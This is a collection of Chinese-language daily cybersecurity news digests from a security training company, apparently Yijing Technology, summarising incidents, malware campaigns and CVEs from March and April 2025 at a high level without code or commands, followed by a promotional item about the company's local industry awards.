1、Stripe旧版API被滥用于信用卡盗刷 https://thehackernews.com/2025/04/legacy-stripe-api-exploited-to-validate.html 2025年4月3日，安全机构发现针对电商平台的网络信用卡盗刷活动，Stripe是一家爱尔兰-美国跨国金融服务和软件即服务（SaaS）公司，攻击者利用Stripe已弃用的旧版API实时验证并回传验证有效性数据。攻击者通过伪造Stripe支付页面，隐藏原订单按钮并植入Base64加密窃密代码，当受害者支付失败后提示刷新页面；部分脚本还伪装Square支付界面并添加比特币等加密货币选项。 2、开源恶意软件致数据窃取成主流 https://www.helpnetsecurity.com/2025/04/03/open-source-malware-index-q1-2025/ 2025年4月2日，根据Sonatype公司的数据显示，第一季度全球开源软件中检测到的恶意软件包为17,954个，同比2024年同期增长超一倍。其中，数据窃取类占比达56%，加密挖矿类占比7%。报告指出，攻击者的攻击目标主要集中于金融、政府及能源领域，并且80%的恶意程序已转向更复杂的载荷投递与代码注入技术。 3、英国皇家邮政疑因供应商被黑导致数据泄露 https://hackread.com/hacker-leaks-royal-mail-group-data-supplier-spectos/ 2025年4月2日，黑客组织GHNA在暗网公开英国皇家邮政集团144GB敏感数据，包括客户个人信息、内部会议录像、邮递路线数据库及Mailchimp营销列表。该组织者称攻击入口为皇家邮政供应商Spectos公司，该供应商曾涉多起数据泄露事件。皇家邮政确认正与Spectos联合调查，但未披露实际影响范围。本次事件系皇家邮政继2023年遭LockBit勒索攻击后又一重大安全危机，本次泄漏事件或引发监管机构对其第三方供应链安全审查。 4、朝鲜黑客组织把目光投向了欧洲企业 https://www.helpnetsecurity.com/2025/04/02/north-korean-it-workers-target-europe/ 2025年4月2日，安全研究员（GTIG）监测到朝鲜攻击组织把目光投向了欧洲企业，通过伪造身份在招聘平台求职。攻击组织重点攻击目标为国防工业、政府部门及区块链技术企业。攻击者利用企业“自带设备”策略的安全盲区，通过个人设备接入公司虚拟机系统来规避监控，并尝试在暴露后勒索赎金。研究显示，此类活动的激增与美国执法部门打击朝鲜IT人员有关，迫使其转向欧洲、亚洲及拉美市场。 5、钓鱼攻击转向邮件附件二维码诱导 https://www.malwarebytes.com/blog/news/2025/04/qr-codes-sent-in-attachments-are-the-new-favorite-for-phishers 2025年4月3日，安全机构监测到新型钓鱼攻击利用邮件附件二维码诱导用户扫描，规避传统邮件过滤检测。攻击者伪造企业HR手册、薪资单等文档，嵌入含短链的二维码，手机扫描后跳转至仿冒微软登录页面窃取账户凭证。技术分析显示，恶意二维码通过动态重定向区分个人与企业邮箱，精准实施凭证窃取。因移动设备安全防护较弱，且短链隐藏真实URL，此类攻击成功率显著上升。 6、GitHub平台曝3900万密钥泄露 https://securityaffairs.com/176170/security/39m-secrets-exposed-github-rolls-out-new-security-tools.html 2025年4月4日，GitHub检测到全球开发者在其平台泄露3900万个敏感密钥。攻击者可利用泄露信息实施横向渗透，即使“低风险”密钥亦可能成为攻击跳板。微软旗下代码托管平台推出独立密钥保护（Secret Protection）与代码安全模块，免费开放公共仓库密钥扫描，并支持团队组织运行全库风险评估。 7、React Router路由库存在一个高危漏洞 https://cybersecuritynews.com/react-router-vulnerability-exposes-web-apps/ 2025年4月4日，安全团队zhero_web_security披露React Router路由库存在影响使用Express适配器的React Router 7及Remix 2框架的高危漏洞（CVE-2025-31137）。该漏洞源于对HTTP请求头Host和X-Forwarded-Host的端口参数处理不当所致，攻击者可在端口字段注入恶意路径名，从而使路由逻辑被篡改。利用此漏洞可实现缓存中毒及绕过Web应用防火墙（WAF）规则，进一步实施XS 8、Android间谍软件卸载时强制要求输入密码 https://cybersecuritynews.com/android-spyware-asks-password-to-uninstall/ 2025年4月4日，研究员发现一款Android间谍软件通过滥用系统“覆盖”功能强制用户输入密码以阻止卸载。该恶意软件通常由具备设备物理访问权限的攻击者植入，获取设备管理员权限后隐藏图标，并在用户尝试通过系统设置卸载时触发密码弹窗（密码由安装者预设）。该软件可窃取短信、位置、照片等敏感数据，且利用合法功能增强隐蔽性。 9、Apache Parquet曝远程代码执行漏洞 https://thehackernews.com/2025/04/critical-flaw-in-apache-parquet-allows.html 2025年4月4日，研究员近期监测到Apache Parquet开源数据格式库存在严重安全漏洞（CVE-2025-30065），其Java版本因Schema解析逻辑缺陷允许远程攻击者通过恶意文件执行任意代码。该漏洞影响范围覆盖1.15.0及之前版本，已被官方修复。Aqua公司披露的攻击案例显示，攻击者正利用自动化工具扫描未修复的Apache服务（如Tomcat），部署加密劫持及持久化后门。 10、WinRAR漏洞可绕过系统Web标志安全警告 https://www.bleepingcomputer.com/news/security/winrar-flaw-bypasses-windows-mark-of-the-web-security-alerts/ 2024年4月5日，研究人员发现WinRAR文件存档器解决方案中的漏洞可被利用来绕过Web 标记（MotW）安全警告，并在Windows计算机上执行任意代码。MotW是Windows的一项安全功能，用于将Internet下载的潜在不安全文件标记为潜在不安全文件。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、卡巴披露在多款安卓手机中检测到Triada木马 https://telecom.cnews.ru/news/top/2025-04-01_na_novyh_smartfonah_nashli 2025年4月1日，卡巴斯基实验室披露，在多款安卓智能手机中检测到新型高危木马病毒 Triada。该病毒通过替换系统文件深度隐藏，可窃取 TikTok、Telegram 账户及加密货币，并具备替换用户号码、监控浏览器行为的能力。 2、KoiLoader新变种利用PowerShell实施攻击 https://cybersecuritynews.com/new-koiloader-abuses-powershell-scripts 2025年4月2日，安全团队发现新型恶意软件KoiLoader变种利用PowerShell脚本及Windows快捷方式（LNK）文件实施攻击。该活动通过伪装金融机构的钓鱼邮件传播，利用Windows漏洞（ZDI-CAN-25373）隐藏命令行参数。攻击链采用多阶段脚本，通过计划任务执行，并注入内存加载窃取程序 3、针对移动设备的仿冒美国国税局钓鱼激增 https://cybersecuritynews.com/new-wave-of-irs-attacks/ 2025年4月2日，网络安全专家发现了一个复杂的网络钓鱼活动，仿冒美国国税局irs.gov的子域，专门针对纳税人的移动设备。大量纳税人需要在 3 月中旬至 4 月 15 日期间完成报税，这段期间这类钓鱼攻击激增了四倍。 4、FIN7组织利用被攻陷的网站传播Anubis后门 https://thehackernews.com/2025/04/fin7-deploys-anubis-backdoor-to-hijack.html 2025年4月2日，俄罗斯黑客组织FIN7（又名Carbon Spider）利用被攻陷的SharePoint站点传播恶意ZIP文件，ZIP文件为Anubis后门。该后门通过内存解密加载主载荷，采用Base64编码与C2服务器通信，支持远程执行命令、文件窃取、注册表篡改及内存注入DLL等操作。 5、微软曝佳能打印机驱动存在高危漏洞 https://securityaffairs.com/176104/security/microsoft-warns-of-critical-flaw-in-canon-printer-drivers.html 2025年4月1日，微软攻击性安全团队披露佳能多款打印机驱动程序存在高危漏洞（CVE-2025-1268）。该漏洞源于EMF数据处理中的内存越界错误，攻击者可利用恶意应用程序在打印任务处理时触发漏洞，导致设备拒绝服务或远程执行任意代码。目前，佳能已发布修复驱动并建议用户通过官方渠道更新，同时修补了其他潜在远程攻击漏洞。安全专家强调，企业应优先部署更新并避免将打印设备直连公网以降低风 6、微软AI工具发现GRUB2和U-boot引导程序20个高危漏洞 https://www.freebuf.com/vuls/426460.html 微软威胁情报团队利用其AI驱动的Security Copilot工具，在广泛使用的开源引导程序GRUB2、U-Boot和Barebox中发现了20个高危漏洞。这些引导程序对操作系统初始化至关重要，特别是在基于Linux的环境和嵌入式系统中。 7、苹果因应用追踪透明度问题被法国罚款1.5亿欧元 https://www.freebuf.com/articles/database/426347.html 法国竞争监管机构Autorité de la concurrence以苹果公司滥用其在移动应用广告市场的主导地位为由，对其处以1.5亿欧元（约合人民币11.62亿元）罚款。监管机构认为，苹果通过应用追踪透明度（App Tracking Transparency，简称ATT）隐私框架实施了这一违规行为。 8、甲骨文公司因涉数百万用户云数据泄露遭集体诉讼 https://www.freebuf.com/articles/database/426350.html 美国德克萨斯州近日成为一场法律风暴的中心，针对甲骨文公司（Oracle Corporation）的大规模云数据泄露事件，当地法院已受理集体诉讼。这起于2025年3月31日向德克萨斯西区联邦地区法院提交的诉状指控甲骨文未能保护敏感信息，且未及时通知受影响用户。 9、疑似NSA网攻行动曝光：神秘零日漏洞利用链 https://www.secrss.com/articles/77290 卡巴斯基日前披露一起尖端的网攻行动，受害者点击定向钓鱼邮件中的链接，该页面暗藏零日漏洞利用代码，可远程绕过Chrome浏览器的沙盒保护机制，结合另一个未知漏洞即可实现远程代码执行，控制受害者的设备。 10、网安标委发布2025年度第一批网络安全国家标准需求 https://mp.weixin.qq.com/s/AW1D5UmNn8XznHrDceHv8g 为加强网络安全国家标准在国家网络安全保障工作中的基础性、规范性、引领性作用，网安标委调研国家网络安全重点工作和技术产业发展需求，研究形成了2025年度第一批网络安全国家标准需求清单。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、莫斯科地铁系统突发大规模服务中断 https://therecord.media/moscow-subway-system-disruption-ukraine-hack-message 2025年3月31日，莫斯科地铁官网及移动应用突发异常，页面显示乌克兰国家铁路公司信息，疑似对此前遭网络攻击的报复。故障期间用户无法远程充值或使用数字通行证，线下服务未受影响。俄官方仅称系“技术维护”，未承认网络攻击。近年来，乌俄黑客频繁互袭交通设施。此次事件凸显两国网络对抗持续升级，交通关键基础设施成为攻击焦点，加剧地缘冲突下的网络安全风险。 2、朝鲜组织借虚假招聘实施ClickFix攻击 https://www.bleepingcomputer.com/news/security/north-korean-hackers-adopt-clickfix-attacks-to-target-crypto-firms/ 2025年3月31日，朝鲜黑客组织升级攻击手段，伪造Coinbase等加密货币企业招聘页面发起“ClickFix”钓鱼攻击。攻击者自2月起搭建虚假面试网站，以摄像头故障为由诱导用户执行系统指令，通过curl下载Go语言后门，并利用注册表及LaunchAgent实现持久化控制，窃取Chrome密码、浏览记录及设备数据。研究人员建议警惕陌生终端命令，并利用Sekoia提 3、黑客利用WordPress目录劫持网站 https://www.elastic.co/security-labs/the-shelby-strategy 2025年3月31日，Sucuri披露黑客滥用WordPress的mu-plugins目录植入恶意脚本，通过三个PHP文件实现多重攻击。该目录因无需激活且隐藏的特性，成为隐蔽攻击载体。攻击脚本可识别搜索引擎爬虫规避检测，并与“ClickFix”虚假验证码分发Lumma木马的攻击形成协同。安全团队建议更新插件、审核代码、启用WAF及强化管理员密码，防范供应链攻击。事件暴露WordPress老旧插件与弱密码策略仍是生态核心风险。 4、思科两个高危漏洞被列入KEV目录 https://securityaffairs.com/176073/hacking/u-s-cisa-adds-cisco-smart-licensing-utility-flaw-known-exploited-vulnerabilities-catalog.html 2025年3月31日，美国CISA将思科智能许可工具两个高危漏洞（CVE-2024-20439、CVE-2024-20440）列入KEV目录。前者因内置静态管理员凭证，允许攻击者通过API控制设备；后者因调试日志泄露API凭据，可远程窃取数据。两漏洞CVSS均为9.8且无需认证即可触发，思科已发布补丁但未提供临时缓解方案。 5、以色列安全公司遭黑客兜售泄露数据 https://www.govinfosecurity.com/check-point-breach-very-pinpointed-event-a-27887 2025年3月31日，黑客在BreachForums宣称入侵以色列网络安全公司Check Point，以5比特币兜售其内部数据。Check Point称此为“数月前处理的旧事件”，仅涉及少量客户门户，未波及核心系统。第三方联合创始人认可数据真实性，但部分用户质疑证据不足。该事件反映安全厂商自身成攻击目标趋势，企业需警惕黑客利用旧漏洞信息进行舆论施压，并强化透明度与风险管控的平衡。 6、苹果警告三处正被活跃利用的零日漏洞 https://www.freebuf.com/vuls/426284.html 苹果公司发布紧急安全公告，披露编号为CVE-2025-24200、CVE-2025-24201和CVE-2025-24085的三处高危零日漏洞正被用于复杂网络攻击。这些漏洞影响iPhone、iPad、Mac等多款苹果设备，用户应立即更新系统以规避安全风险。 7、CrushFTP 漏洞概念验证代码公开后遭攻击者利用 https://www.freebuf.com/vuls/426287.html 安全研究人员证实，在概念验证（PoC）利用代码公开后，针对CrushFTP关键身份验证绕过漏洞（CVE-2025-2825）的攻击尝试已经开始活跃。根据Shadowserver基金会最新监测数据，截至2025年3月30日，全球仍有约1512个未打补丁的实例处于暴露状态，其中北美地区占比最高（891台）。 8、黑客利用DNS MX记录动态创建超100个品牌虚假登录页面 https://www.freebuf.com/news/426184.html 一种复杂的网络钓鱼活动已经出现，它创造性地利用了域名系统（DNS）的邮件交换（MX）记录，能够根据受害者的电子邮件提供商，动态地展示量身定制的虚假登录页面。这种攻击可以模仿超过 100 个品牌，代表了网络钓鱼技术的重大演进。 9、零售巨头山姆会员店遭Clop勒索软件攻击，回应称正在调查 https://www.bleepingcomputer.com/news/security/retail-giant-sams-club-investigates-clop-ransomware-breach-claims/ Sam's Club 正在调查有关其遭受了 Clop 恶意软件攻击的指控。沃尔玛部门在美国和波多黎各经营着超过600家会员制仓库俱乐部，拥有数百万会员。 10、 针对个人信息保护问题，四部门联合开展专项行动 https://mp.weixin.qq.com/s/OfDgrkVEbjI0AVTx6o__rA 2025年，中央网信办将会同工业和信息化部、公安部、市场监管总局等部门，进一步深入治理常用服务产品和常见生活场景中存在的违法违规收集使用个人信息典型问题。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、研究人员发现新型安卓恶意软件TsarBot https://cyble.com/blog/tsarbot-using-overlay-attacks-targeting-bfsi-sector/ 研究人员近期发现了一种新的安卓恶意软件，并将其命名为TsarBot。TsarBot通过伪装成合法金融平台的网络钓鱼网站进行传播。它使用覆盖攻击，通过在合法应用程序上显示虚假的登录页面来窃取银行凭据、信用卡详细信息和登录凭据。TsarBot能够监控屏幕并进行远程控制，并且可以通过黑色覆盖屏幕隐藏其恶意活动。研究人员在相关恶意应用程序中发现了多处俄语，这表明可能是使用俄语的攻击者开发了该恶意软件。 2、戴尔修复其产品中的多个安全漏洞 https://securityonline.info/cve-2025-22398-dell-unity-hit-by-9-8-cvss-root-level-command-injection-flaw/ 戴尔于2025年3月27日发布了一则安全公告，详细介绍了影响Dell Unity产品的多个安全漏洞。这些漏洞是CVE-2025-22398（CVSS评分9.8）、CVE-2025-24383（CVSS评分9.1）、CVE-2025-24381（CVSS评分8.8）及多个本地权限提升漏洞。受影响的产品是5.4及更早版本的Dell Unity、Dell UnityVSA和Dell Unit 3、亚特兰大国际机场网站遭受拒绝服务攻击 https://www.fox5atlanta.com/news/atlanta-airport-stops-potential-cyberattack-friday-morning 2025年3月28日，一次拒绝服务（DoS）攻击短暂中断了哈兹菲尔德-杰克逊亚特兰大国际机场的网站，但机场运营并未受到影响。据该机场官员称，亚特兰大国际机场的技术团队检测到了此次网络攻击，并迅速实施了标准保护措施以恢复访问。虽然用户在访问网站时可能会遇到短暂延迟，但机场运营并未受到影响。此次事件已得到控制，机场网站目前运行正常。目前尚不清楚此次攻击背后的攻击者是谁。 4、SimonMed Imaging确认遭到MEDUSA勒索组织攻击 https://www.claimdepot.com/data-breach/simonmed-imaging 2025年1月28日，SimonMed Imaging在其网络上发现了可疑活动。经过调查，该公司确认他们遭到了MEDUSA勒索组织发起的勒索软件攻击。对SimonMed Imaging系统的未经授权访问发生在2025年1月21日至2025年2月5日之间，MEDUSA勒索组织声称已获取约212.616GB的数据。对此次泄露的调查仍在进行中，受影响的个人总数尚不清楚。然而，SimonMed Imaging已确定受攻击的系统中可能包含个人身份信息（PII）和受保护的健康信息（PHI）。泄 5、Ubuntu 安全限制遭突破：攻击者可利用内核漏洞提权 https://www.freebuf.com/articles/system/426212.html Ubuntu Linux 系统中存在三处关键安全限制绕过漏洞，允许本地攻击者提升权限并利用内核漏洞。这些漏洞影响 Ubuntu 23.10 和 24.04 LTS 系统，这些系统原本通过基于 AppArmor 的防护机制来限制命名空间滥用。 6、CoffeeLoader恶意软件利用GPU加壳技术规避检测 https://www.freebuf.com/articles/endpoint/426221.html Zscaler威胁实验室ThreatLabz发现，自2024年9月开始活跃的CoffeeLoader恶意软件家族采用多种技术规避终端安全检测，以下载第二阶段有效载荷。该恶意软件运用的高级技术包括：基于GPU的加壳、调用栈欺骗、休眠混淆和Windows纤程技术。该恶意软件通过SmokeLoader传播，两者具有相似行为特征。 7、高危PHP漏洞可绕过验证加载恶意内容 https://www.freebuf.com/vuls/426133.html PHP的libxml流组件中发现一个高危漏洞，可能影响依赖DOM或SimpleXML扩展处理HTTP请求的Web应用程序。该漏洞编号为CVE-2025-1219，源于处理重定向资源时对content-type标头的错误处理，可能导致文档解析错误和验证绕过等安全风险。 8、《中华人民共和国网络安全法（修正草案再次征求意见稿）》发布 https://mp.weixin.qq.com/s/GouWZ0PAPYHB2EI8BFsdUA#/ 根据《十四届全国人大常委会立法规划》，国家互联网信息办公室同相关部门进一步研究起草了《中华人民共和国网络安全法（修正草案再次征求意见稿）》，并向社会公开征求意见。 9、Mozilla紧急修复Firefox高危漏洞，与Chrome零日漏洞原理相似 https://thehackernews.com/2025/03/mozilla-patches-critical-firefox-bug.html 在谷歌修复Chrome浏览器中一个已被积极利用的零日漏洞（zero-day）数日后，Mozilla也发布了针对Windows版Firefox浏览器高危安全漏洞的更新补丁。 10、OpenAI将严重漏洞最高赏金提高至10万美元 https://www.securityweek.com/openai-offering-100k-bounties-for-critical-vulnerabilities/ 人工智能技术巨头OpenAI 将最高漏洞赏金从2万美元提高至10万美元，而这是该公司设立发现基础设施和产品中严重和高危漏洞外包计划的一部分。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、APT36创建虚假的印度邮政网站进行攻击活动 https://www.cyfirma.com/research/turning-aid-into-attack-exploitation-of-pakistans-youth-laptop-scheme-to-target-india/ 研究人员发现了一个冒充印度邮局的恶意网站，该网站传播一个恶意安卓应用程序和一个针对Windows用户的PDF文件。当用户通过Windows访问该网站时，该网站会投放一个包含“ClickFix”策略的恶意PDF文件。该文档指示用户按“Win+R”键，将提供的恶意PowerShell命令粘贴到“运行”对话框中执行。而当用户通过安卓端访问时，该网站会下载一个名为 2、Mozilla修复Firefox中的一个安全漏洞 https://www.bleepingcomputer.com/news/security/mozilla-warns-windows-users-of-critical-firefox-sandbox-escape-flaw/ Mozilla发布了Firefox 136.0.4，以修复一个安全漏洞，该漏洞可以让攻击者逃逸Windows系统上的Web浏览器沙箱。此漏洞被标识为CVE-2025-2857，虽然Mozilla还没有分享有关CVE-2025-2857的技术细节，但Mozilla表示该漏洞类似于谷歌刚刚修复的Chrome零日漏洞。该漏洞只影响Windows系统上的Firefox，其 3、马来西亚吉隆坡国际机场遭受网络攻击 https://therecord.media/malaysia-pm-says-country-rejected-ransom-demand-airport-cyberattack 马来西亚网络安全机构和航空管理局称，马来西亚吉隆坡国际机场（KLIA）3月23日因遭受网络攻击而导致计算机中断。马来西亚总理证实了此次事件，并表示攻击者针对的是运营该国大部分机场的马来西亚机场控股公司（MAHB），并索要1000万美元的赎金。该国拒绝了攻击者关于1000万美元的勒索要求，目前没有透露此次攻击的幕后黑手，也没有任何组织声称对此次事件负责。 4、研究人员发现利用Discord API的远控木马 https://www.cyfirma.com/research/analysis-of-a-discord-based-remote-access-trojan-rat/ 研究人员发现并分析了一种基于Python的远控木马（RAT），该木马利用Discord API作为命令和控制（C2）服务器，执行任意系统命令、窃取敏感信息、捕获屏幕截图以及操纵本地计算机和Discord服务器。研究人员对该远控木马进行了深入分析，并提供了防护建议。 5、研究人员发现安卓恶意软件Crocodilus https://www.threatfabric.com/blogs/exposing-crocodilus-new-device-takeover-malware-targeting-android-devices 研究人员近期发现了以前从未见过的样本，经分析发现是新型安卓恶意软件，研究人员根据其开发者留下的信息将其命名为“Crocodilus”。尽管该恶意软件是新的，但它已经具备覆盖攻击、键盘记录、远程访问和远程控制等功能。研究人员已经发现攻击者利用该恶意软件针对西班牙和土耳其的银行用户以及流行加密货币钱包进行攻击。 6、RESURGE恶意软件利用Ivanti中的漏洞进行攻击 https://www.cisa.gov/news-events/alerts/2025/03/28/cisa-releases-malware-analysis-report-resurge-malware-associated-ivanti-connect-secure 美国网络安全和基础设施安全局（CISA）发布了一份恶意软件分析报告，其中包含对识别为RESURGE的一种恶意软件变种的分析和检测规则。RESURGE恶意软件对Ivanti Connect Secure设备中CVE-2025-0282漏洞进行恶意利用，该漏洞是Ivanti Connect Secure、Policy Sec 7、研究人员发现新型恶意软件SHELBY https://www.elastic.co/security-labs/the-shelby-strategy 研究人员在分析一封网络钓鱼邮件时发现了SHELBY恶意软件。SHELBY恶意软件滥用GitHub进行命令和控制，窃取数据并接收命令。此外，研究人员在攻击者的C2设计中发现一个严重缺陷，任何拥有个人访问令牌（PAT）的人都可以控制受感染的计算机。该恶意软件中存在的未使用代码表明攻击者仍在进行开发，这表明该恶意软件未来可能会出现新的版本。 8、Splunk修复其产品中的数十个安全漏洞 https://www.securityweek.com/splunk-patches-dozens-of-vulnerabilities/ Splunk为其产品发布数十个安全漏洞修复补丁，其中包括Splunk Enterprise和Secure Gateway App中的两个高危漏洞。Splunk还修复Splunk Enterprise中的中危安全漏洞，这些漏洞可能导致维护模式修改、安全防护绕过、信息泄露和操纵其他用户数据。Splunk没有提到这些漏洞被利用的情况。建议用户尽快更新其Splunk Enterprise实例和其他受影响的Splunk应用程序。 9、Oracle Health发生数据泄露事件 https://www.bleepingcomputer.com/news/security/oracle-health-breach-compromises-patient-data-at-us-hospitals/ Oracle Health公司表示，他们在2025年2月20日发现了遗留的Cerner数据迁移服务器中的数据遭到泄露。攻击者在2025年1月22日之后的某个时间，使用泄露的客户凭据入侵了服务器，并窃取了数据。这些泄露的数据中可能包含电子健康记录中的患者信息。Oracle Health公司尚未公开披露此事件，但给受影响的客户发送了私人通信。目前尚不清楚此次攻击中是否部署了勒索软 10、Telegram560 亿条公开群聊记录被索引，涉 8.6 亿用户 https://www.freebuf.com/news/426083.html 即时通讯平台 Telegram 上出现一个名为 Funstatgrtbot 的机器人，引发了广泛关注和用户对隐私的担忧。据报告，该机器人已成功抓取并索引了 Telegram 公开群组和频道中高达 560 亿条的用户发言记录，时间跨度至少六年，涉及约 8.6 亿 Telegram 用户和 3600 万个公开群组及频道。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

导语：湖南蚁景科技在行业中脱颖而出，一举斩获 “2024年度湖南湘江新区在线教育行业红名单企业” 以及 “2024年度湖南湘江新区互联网在线教育行业成长企业” 两项重磅殊荣，彰显其强劲实力与发展潜力。 2025年3月21日，湖南湘江新区互联网在线培训行业协会 2024 年度表彰大会暨企业战略目标管理峰会盛大举行。本次大会以 “聚力・变革・破局” 为主题，汇聚各方力量，共商在线教育发展的崭新篇章，为行业发展注入新的活力与方向。 领导致辞 湖南湘江新区商务和市场监管局领导及相关处室负责人、本地权威媒体代表、湘江新区互联网在线培训行业协会会长以及 50 余家会员单位代表齐聚一堂，共同见证这一行业盛事。湖南湘江新区商务和市场监管局党组成员、岳麓区市监局局长吴卫先生在大会上发表开幕致辞。他全面回顾了过去一年行业在规范化发展方面取得的显著成效，并对行业未来发展提出了三点殷切期望：一是严守合规底线，确保行业健康有序发展；二是聚力服务大局，为区域经济社会发展贡献力量；三是积极践行社会责任，树立良好行业形象。 在众多优秀企业中，湖南蚁景科技有限公司凭借其在行业发展进程中的卓越表现脱颖而出，成功摘得 “2024 年度湖南湘江新区在线教育行业红名单企业” 与 “2024 年度湖南湘江新区互联网在线教育行业成长企业” 两项含金量十足的荣誉。这不仅是对蚁景科技过去一年辛勤耕耘的高度认可，更是对其未来持续创新发展的有力鞭策。 蚁景科技代表在发言中表示，此次荣获双项荣誉，是公司发展历程中的重要里程碑。这既是对过往努力的肯定，更是激励公司不断前行的动力源泉。蚁景科技将以这两项荣誉为新的起点，持续加大在技术创新与人才培养方面的投入力度，积极为湖南湘江新区打造 “在线教育湘军” 品牌添砖加瓦。同时，蚁景科技也呼吁更多同行企业携手共进，凝聚行业力量，共同开拓在线教育行业的美好新未来。 关于蚁景网安学院 蚁景网安学院已推出覆盖Web安全攻防、渗透测试实战、CTF竞赛特训、Python安全开发等热门网安领域的课程体系，深度对接企业用人需求，构建起"知识学习-技能实战-就业内推"的人才培养生态，精准打通网络安全人才输送的"最后一公里"。 我们将坚定不移地持续优化人才培养体系、推进技术创新、促进人才生态的良性发展，矢志不渝地致力于培育更多高素质、高水平的网络安全专业精英人才，全力推动网络安全技术教学的深度创新与广泛应用，为全面提升网络安全人才的实战能力贡献更多力量，助力网络安全行业迈向新的高峰。

1、RedCurl组织使用QWCrypt勒索软件进行攻击 https://www.bitdefender.com/en-us/blog/businessinsights/redcurl-qwcrypt-ransomware-technical-deep-dive 研究人员称，RedCurl组织正在使用QWCrypt勒索软件针对Hyper-V虚拟机进行攻击。随着企业越来越多地转向虚拟机来托管其服务器，勒索软件团伙也紧随这一趋势，创建专门针对虚拟化平台的加密器。大多数勒索软件都在针对VMware ESXi服务器，而RedCurl的新型“QWCrypt”勒索软件则针对托管在Hyper-V上的虚拟机。在加密文件时，QWCrypt使用XChaCha20-Po 2、谷歌修复了Chrome中的一个零日漏洞 https://www.bleepingcomputer.com/news/security/google-fixes-chrome-zero-day-exploited-in-espionage-campaign/ 谷歌修复了一个高危的Chrome零日漏洞，该漏洞被用于逃避浏览器的沙箱，并在针对俄罗斯媒体机构和教育组织的攻击中部署恶意软件。该漏洞被标识为CVE-2025-2783，虽然谷歌将该漏洞标记为在攻击活动中被恶意利用，但目前尚未分享有关该漏洞的详细信息。研究人员发布了一份报告，其中包含更多详细信息，称攻击者使用CVE-2025-2783漏洞利用程序绕过Chrome沙箱保护，并使用复 3、Arkana Security勒索组织声称入侵了WideOpenWest的系统 https://www.securityweek.com/new-ransomware-group-claims-attack-on-us-telecom-firm-wideopenwest/ 一个名为“Arkana Security”的新勒索软件组织声称入侵美国电信运营商WideOpenWest（WOW!）的系统，并控制了关键系统，此外还窃取了客户信息。该勒索组织称，他们窃取了两个数据库，一个包含40.3万个帐户，另一个包含 220万个帐户，其中包含用户名、帐户 ID、密码、安全信息、姓名、电子邮件、权限和Firebase集成详细信息等。WOW!尚未对此次攻击及数据泄露事件进行确认。 4、俄罗斯卢克石油公司遭受网络攻击 https://newsukraine.rbc.ua/news/russian-lukoil-hit-by-large-scale-cyberattack-1742981848.html 俄罗斯卢克石油公司于3月26日遭受大规模黑客攻击。俄罗斯在线媒体Baza报道称，该公司整个系统自早上以来一直瘫痪。根据Baza的消息来源，公司员工无法访问他们的工作电脑，并且屏幕上显示了一条关于故障的消息。所有员工都被要求不要使用用户名和密码登录其工作帐户，以防止数据泄露。目前，客户端用户系统和公司内部数据库的访问权限均已关闭。 5、Oracle客户确认攻击者声称泄露的数据有效 https://www.bleepingcomputer.com/news/security/oracle-customers-confirm-data-stolen-in-alleged-cloud-breach-is-valid/ 上周，一个名为“rose87168”的攻击者声称入侵了Oracle云服务器，并开始出售据称600万用户的身份验证数据和加密密码。尽管当时Oracle否认了此次事件，但其一些客户公司的代表确认了数据的真实性。这些公司的代表表示，相关的LDAP显示名称、电子邮件地址、名字和其他识别信息都是正确的，并且属于他们。Oracle目前尚未对此进行回应。 6、Splunk 高危漏洞：攻击者可通过文件上传执行任意代码 https://www.freebuf.com/vuls/425878.html Splunk 近日发布补丁，修复了影响 Splunk Enterprise 和 Splunk Cloud Platform 的高危远程代码执行（RCE）漏洞。该漏洞编号为 CVE-2025-20229，可能允许低权限用户通过上传恶意文件执行任意代码。 7、加密货币盗窃案主犯"Wiz"落网 涉案金额达2.43亿美元 https://www.freebuf.com/news/425807.html 美国法警近日逮捕了2.43亿美元加密货币盗窃案的关键嫌疑人维·切塔尔（Veer Chetal），其网络代号为"Wiz"。区块链调查员ZachXBT通过推特公布了这一案件进展。 8、恶意npm包修改本地ethers库以发起反向Shell攻击 https://thehackernews.com/2025/03/malicious-npm-package-modifies-local.html 网络安全研究人员在 npm 注册表中发现了两个恶意软件包，旨在感染另一个本地安装的软件包。有问题的软件包是ethers-provider2和ethers-providerz，前者自2025 年 3 月 15 日发布以来已被下载 73 次。第二个软件包很可能被恶意软件作者自己删除，因此没有吸引任何下载。 9、macOS 用户警惕 ReaderUpdate 恶意软件新版本 https://www.securityweek.com/macos-users-warned-of-new-versions-of-readerupdate-malware/ 据 SentinelOne 报道，macOS 恶意软件加载器 ReaderUpdate 背后的威胁行为者使用 Crystal、Nim、Rust 和 Go 编程语言构建了该威胁的新版本。 10、Appsmith 开发工具漏洞使攻击者可执行远程代码 https://cybersecuritynews.com/appsmith-developer-tool-remote-code/ 安全研究人员发现了用于构建内部应用程序的流行开源开发平台 Appsmith 中存在多个严重漏洞。 最令人担忧的是 CVE-2024-55963，它允许未经身份验证的攻击者在运行 Appsmith 版本 1.20 至 1.51 的默认安装的服务器上执行任意系统命令。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

